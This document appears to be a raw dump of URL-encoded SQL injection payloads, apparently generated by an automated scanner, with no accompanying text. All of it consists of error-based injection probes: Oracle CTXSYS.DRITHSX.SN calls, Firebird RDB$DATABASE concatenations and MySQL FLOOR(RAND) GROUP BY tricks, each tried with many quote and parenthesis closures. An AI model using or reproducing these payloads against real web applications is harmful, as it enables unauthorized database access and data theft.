1234.5%22%29%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22mceM%22%20LIKE%20%22mceM 1234.5%22%29%29%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22GedE%22%20LIKE%20%22GedE 1234.5%22%29%29%29%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22qTas%22%20LIKE%20%22qTas 1234.5%22%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%22CYiz%22%20LIKE%20%22CYiz 1234.5%29%20WHERE%206383%3D6383%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29 1234.5%27%29%20WHERE%207475%3D7475%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29 1234.5%27%20WHERE%203092%3D3092%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29 1234.5%22%20WHERE%204045%3D4045%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29 1234.5%27%20%7C%7C%20%28SELECT%205558%20FROM%20DUAL%20WHERE%209593%3D9593%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208910%20WHERE%209129%3D9129%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%204255%20FROM%20DUAL%20WHERE%201205%3D1205%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20%29 1234.5%20%2B%20%28SELECT%205532%20WHERE%206471%3D6471%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27YVbu%27%20FROM%20DUAL%20WHERE%203513%3D3513%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27tWax%27%20WHERE%206615%3D6615%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20%23 1234.5%29%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29 1234.5%27%29%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29 1234.5%27%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29 1234.5%22%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29 1234.5%29%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%287740%3D7740 1234.5%29%29%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%285357%3D5357 1234.5%29%29%29%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%28%286146%3D6146 1234.5%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29 1234.5%27%29%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%27cYgo%27%3D%27cYgo 1234.5%27%29%29%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%28%27DoZy%27%3D%27DoZy 1234.5%27%29%29%29%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%28%28%27bpmC%27%3D%27bpmC 1234.5%27%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%27ExlU%27%3D%27ExlU 1234.5%27%29%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%27OZOk%27%20LIKE%20%27OZOk 1234.5%27%29%29%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%28%27okbQ%27%20LIKE%20%27okbQ 1234.5%27%29%29%29%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%28%28%27FZqc%27%20LIKE%20%27FZqc 1234.5%27%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%27Wcgc%27%20LIKE%20%27Wcgc 1234.5%22%29%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%22ggmO%22%3D%22ggmO 1234.5%22%29%29%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%28%22NXFM%22%3D%22NXFM 1234.5%22%29%29%29%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%28%28%22czym%22%3D%22czym 1234.5%22%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%22PlyV%22%3D%22PlyV 1234.5%22%29%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%22oSwU%22%20LIKE%20%22oSwU 1234.5%22%29%29%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%28%22ACem%22%20LIKE%20%22ACem 1234.5%22%29%29%29%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%28%28%22XSKv%22%20LIKE%20%22XSKv 1234.5%22%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%22pRHs%22%20LIKE%20%22pRHs 1234.5%29%20WHERE%208249%3D8249%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29 1234.5%27%29%20WHERE%205353%3D5353%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29 1234.5%27%20WHERE%203212%3D3212%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29 1234.5%22%20WHERE%204798%3D4798%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29 1234.5%27%20%7C%7C%20%28SELECT%202490%20FROM%20DUAL%20WHERE%208556%3D8556%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209068%20WHERE%208768%3D8768%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%207251%20FROM%20DUAL%20WHERE%209427%3D9427%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20%29 1234.5%20%2B%20%28SELECT%201657%20WHERE%206741%3D6741%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27IsYF%27%20FROM%20DUAL%20WHERE%208919%3D8919%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27btxn%27%20WHERE%201519%3D1519%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%201600%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201600%20WHEN%201600%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20%23 -2278%29%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -4125%27%29%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -3971%27%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -8188%22%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -1394%29%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%288429%3D8429 -6585%29%29%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%285758%3D5758 -5990%29%29%29%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%284763%3D4763 -9771%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -9924%27%29%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27xYXP%27%3D%27xYXP -3438%27%29%29%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27TjXv%27%3D%27TjXv -7018%27%29%29%29%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27IgTw%27%3D%27IgTw -6047%27%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27vGyx%27%3D%27vGyx -7118%27%29%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27MXis%27%20LIKE%20%27MXis -4607%27%29%29%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27AByD%27%20LIKE%20%27AByD -7970%27%29%29%29%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27Nqzm%27%20LIKE%20%27Nqzm -1812%27%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27wXmE%27%20LIKE%20%27wXmE -1920%22%29%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22FCqP%22%3D%22FCqP -6730%22%29%29%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22LsRy%22%3D%22LsRy -1729%22%29%29%29%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22BDSm%22%3D%22BDSm -4680%22%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22RLqb%22%3D%22RLqb -4242%22%29%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22CgWz%22%20LIKE%20%22CgWz -6651%22%29%29%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22dlFs%22%20LIKE%20%22dlFs -7152%22%29%29%29%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22hUTD%22%20LIKE%20%22hUTD -6527%22%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22SNHc%22%20LIKE%20%22SNHc -2220%29%20WHERE%206565%3D6565%20OR%20%28SELECT%207613%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 